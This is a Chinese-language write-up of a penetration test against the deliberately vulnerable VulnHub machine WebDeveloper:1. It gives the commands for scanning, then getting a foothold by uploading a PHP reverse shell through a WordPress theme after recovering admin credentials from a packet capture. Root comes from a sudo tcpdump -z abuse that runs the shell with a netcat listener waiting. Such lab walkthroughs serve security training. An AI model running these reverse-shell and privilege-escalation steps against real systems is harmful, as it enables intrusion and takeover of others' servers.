WebDeveloper:1靶机渗透测试

一、靶机下载地址

https://www.vulnhub.com/entry/web-developer-1,288/

二、信息收集

1、主机发现

复制代码
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:54:22:E9"

2、端口扫描

复制代码
# 使用命令
nmap 192.168.145.216 -p- -sV

3、指纹识别

复制代码
# 使用命令
whatweb "http://192.168.145.216"

4、目录扫描

复制代码
# 使用命令
dirsearch -u "http://192.168.145.216"

三、获取shell

1、访问靶机IP地址

2、拼接并访问ipdata目录,发现一个流量包,下载使用wireshark打开

3、查看后发现wordpress后台用户密码:webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

4、拼接并访问/wp-admin,发现登录框界面

5、用找到的用户名密码登录wordpress,登录成功

6、利用wordpress的上传theme功能getshell,在下处发现一处文件上传页面

7、把kali linux自带的php反弹shell代码(/usr/share/webshells/php/php-reverse-shell.php)直接把/usr/share/webshells/php/php-reverse-shell.php改一下ip和port,保存,并上传。

复制代码
# 使用命令
mv php-reverse-shell.php /home/kali/Desktop
vim php-reverse-shell.php

8、上传php-reverse-shell.php文件

9、经过尝试发现上传的反弹shell在wp-content/uploads/ 目录的子目录下

10、kali开启监听

复制代码
# 使用命令
nc -lvnp 1234

11、访问上传的文件,成功反弹到shell

12、输入以下命令,获得交互式shell

复制代码
# 使用命令
python3 -c 'import pty; pty.spawn("/bin/bash")'

四、提权

1、进入到/var/www/html/wp-config.php,找到数据库wordpress的用户名和密码webdeveloper : MasterOfTheUniverse

2、使用ssh进行连接

复制代码
# 使用命令
ssh webdeveloper@192.168.145.216

3、输入如下命令查找php-reverse-shell.php的位置,找到其位置在/var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php

复制代码
# 使用命令
find / -name php-reverse-shell.php 2>/dev/null

4、然后输入以下命令,并且kali开启监听

复制代码
# 使用命令
COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

# 监听
nc -lvnp 1234

5、成功反弹到shell,提权成功

相关推荐
一名优秀的码农4 小时前
vulhub系列-12-Hackademic.RTB1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
m0_738120724 小时前
sqli-labs过关解析(17- 20附带源码解析)
数据库·sql·web安全·php·ctf·安全性测试
Codefengfeng6 小时前
kali安装与使用蚁剑(antsword)
web安全·网络安全·系统安全
The_Uniform_C@t27 小时前
AWD | ATT&CK实战系列--蓝队防御(一)
网络·学习·网络安全
撩妹小狗9 小时前
渗透测试-信息收集篇-上-手动收集
web安全·网络安全
钟智强9 小时前
CVE-2025-49844高危预警:Redis Lua脚本引擎UAF漏洞深度剖析与POC实战
数据库·redis·web安全·junit·lua
Whoami!10 小时前
⓬⁄₇ ⟦ OSCP ⬖ 研记 ⟧ Linux权限提升 ➱ 利用Cron任务配置不当实现提权
网络安全·信息安全·linux提权·cron任务
Pure_White_Sword1 天前
bugku-reverse题目-NoString
网络安全·ctf·reverse·逆向工程
枷锁—sha1 天前
【CTFshow-pwn系列】03_栈溢出【pwn 051】详解:C++字符串替换引发的血案与 Ret2Text
开发语言·网络·c++·笔记·安全·网络安全
菩提小狗1 天前
第18天:信息打点-APP资产&知识产权&应用监控&静态提取&动态抓包&动态调试_笔记|小迪安全2023-2024|web安全|渗透测试|
笔记·安全·web安全